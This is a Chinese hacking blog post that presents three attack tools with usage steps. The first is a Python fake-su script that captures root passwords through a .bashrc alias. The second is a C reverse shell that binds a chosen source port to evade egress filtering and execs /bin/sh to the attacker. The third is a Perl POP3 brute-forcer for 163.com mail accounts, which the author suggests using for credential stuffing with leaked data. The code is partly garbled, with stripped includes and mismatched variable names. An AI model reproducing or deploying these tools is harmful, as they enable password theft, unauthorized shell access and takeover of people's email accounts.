渗透的很多时候，在网上找到的工具并不适用，自己写代码才是王道，下面三个程序都是渗透时在网络上找不到合适工具，自己辛苦开发的，短小使用，求欣赏，求好评，

0×01

记录root密码小工具：

root.py

01#!/usr/bin/python

02importos, sys, getpass, time

03

04current_time=time.strftime("%Y-%m-%d %H:%M")

05logfile="/dev/shm/.su.log"//密码获取后记录在这里

06#CentOS

07#fail_str = "su: incorrect password"

08#Ubuntu

09#fail_str = "su: Authentication failure"

10#For Linux Korea                   //centos,ubuntu,korea 切换root用户失败提示不一样

11fail_str="su: incorrect password"

12try:

13passwd=getpass.getpass(prompt='Password: ');

14file=open(logfile,'a')

15file.write("[%s]t%s"%(passwd, current_time))//截取root密码

16file.write('n')

17file.close()

18except:

19pass

20time.sleep(1)

21printfail_str//打印切换root失败提示

渗透linux拿到低权限并提权无果时，将这个程序传上去，再将一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py’; 低权限用户su root 后 成功记录密码。密码记录路径请看脚本

0×02

设置源端口反弹shell

渗透某个linux服务器，反连时目标端口为888不行，53，80还是不行，

Ping了下百度 可以ping通，

那真相只有一个

服务器变态的限制了只能某些提供已某些端口为源端口去连接外面

比如

只允许接收对80端口的访问数据包，并以80为源端口向外回复数据。

谷歌程序无果，自己查了相关api后写了个。

client-port.c

01#include

02#include

03#include

04#include

05#include

06voiderror(char*msg)

07{

08perror(msg);

09exit(0);

10}

11intmain(intargc,char*argv[])

12{

13intsockfd, portno, lportno,n;

14structsockaddr_in serv_addr;

15structsockaddr_in client_addr;

16structhostent *server;

17charbuffer[256];

18if(argc < 3) {

19fprintf(stderr,"usage %s hostname port LocalPortn", argv[0]);

20exit(0);

21}//三个参数，目标主机，目标主机端口，本地源端口

22portno =atoi(argv[2]);

23sockfd = socket(AF_INET, SOCK_STREAM, 0);

24if(sockfd < 0)

25error("ERROR opening socket");

26

27

28bzero((char*) &client_addr,sizeof(client_addr));

29lportno =atoi(argv[3]);

30client_addr.sin_family = AF_INET;

31client_addr.sin_addr.s_addr = INADDR_ANY;

32client_addr.sin_port = htons(lportno);//设置源端口

33if(bind(sockfd, (structsockaddr *) &client_addr,

34sizeof(client_addr)) < 0)

35error("ERROR on binding");

36

37server = gethostbyname(argv[1]);

38if(server == NULL) {

39fprintf(stderr,"ERROR, no such host ");

40exit(0);

41}

42bzero((char*) &serv_addr,sizeof(serv_addr));

43serv_addr.sin_family = AF_INET;

44bcopy((char*)server->h_addr,

45(char*)&serv_addr.sin_addr.s_addr,

46server->h_length);

47serv_addr.sin_port = htons(portno);

48if(connect(sockfd,&serv_addr,sizeof(serv_addr)) < 0)//连接

49error("ERROR connecting");

50dup2(fd, 0);

51dup2(fd, 1);

52dup2(fd, 2);

53execl("/bin/sh","sh -i", NULL);//执行shell

54close(fd);

55}

用法：

1gcc client-port.c -o port

1chmod +x port

1./port 你的IP 你的监听端口 本地的源端口

如 ./port http://www.myhack58.com 80 80

成功反弹shell 提权成功

0×03邮箱爆破脚本

某个时候 需要爆破一批邮箱

Burp163.pl

01#!/usr/bin/perl

02useNet::POP3;

03$email="pop.163.com";         //设置pop服务器地址 163为pop.163.com

04$pop= Net::POP3->new($email)ordie("ERROR: Unable to initiate. ");

05print$pop->banner();

06$pop->quit;

07$i=0;

08open(fp1,"user.txt");

09@array1=;

10open(fp2,"pass.txt");

11@array2=;                    //从文件中获取邮箱用户名及密码

12foreach$a(@array1) {

13$u=substr($a,0,length($a)-1);

14$u=$u."@163.com";

15foreach$b(@array2) {

16$p=substr($b,0,length($b)-1);

17print"cracked with ".$u."-----".$p."n";

18$i=$i+1;

19$pop= Net::POP3->new($email)ordie("ERROR: Unable to initiate. ");

20$m=$pop->login($u,$p);             //尝试登录邮箱

21if($m>0)

22{

23print$u."------------".$p."----"."success"."n";

24$pop->quit;

25}                               //成功登录

26else

27{

28print$u."------------".$p."----"."failed"."n";

29$pop->quit;                                    //登录失败

30}

31}

32}

33print$i;

用法 将要爆破的邮箱的pop服务器写入下面这一行 默认是163邮箱

1$email="pop.163.com";

再将去除掉@后面部分的邮箱地址比如sude@163.com 去除后sude存进去

同目录user.txt中吗，再将字典存进去pass.txt

你会说

这个有点鸡肋吧 万一邮箱的密码很复杂

呵呵

搞到了一个小站的数据，

用这个程序批量测试密码是否就是邮箱密码 呵呵

我啥都没说，入侵渗透专用的python小脚本脚本安全》(https://www.unjs.com)。

0×04

这三个程序仅供技术研究，如读者用于违法行为，本人概不负